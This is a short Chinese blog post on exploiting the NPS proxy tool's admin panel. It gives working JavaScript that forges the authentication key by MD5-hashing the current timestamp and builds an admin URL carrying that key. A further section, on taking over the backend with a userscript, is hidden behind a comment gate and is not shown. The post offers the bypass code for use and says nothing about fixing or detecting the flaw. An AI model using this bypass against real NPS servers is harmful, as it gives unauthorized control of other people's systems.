NPS 漏洞利用

@zgcwkj  2025年05月12日

分类:

代码 其它 

标签:

JS 

NPS 漏洞在好久以前就爆出来了。不过我最近才看到,所以记录一下。

漏洞说明

JS 伪造鉴权认证

引用库:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js

const timestampSec = Math.floor(Date.now() / 1000).toString();
const auth_key = CryptoJS.MD5(CryptoJS.enc.Utf8.parse(timestampSec)).toString(CryptoJS.enc.Hex);

document.body.textContent = "index/index?auth_key=" + auth_key + "&" + "timestamp=" + timestampSec;

通过油猴脚本完整接管后台

内容已隐藏,需要评论并且审核通过后,才能阅读隐藏内容

评论已关闭

Top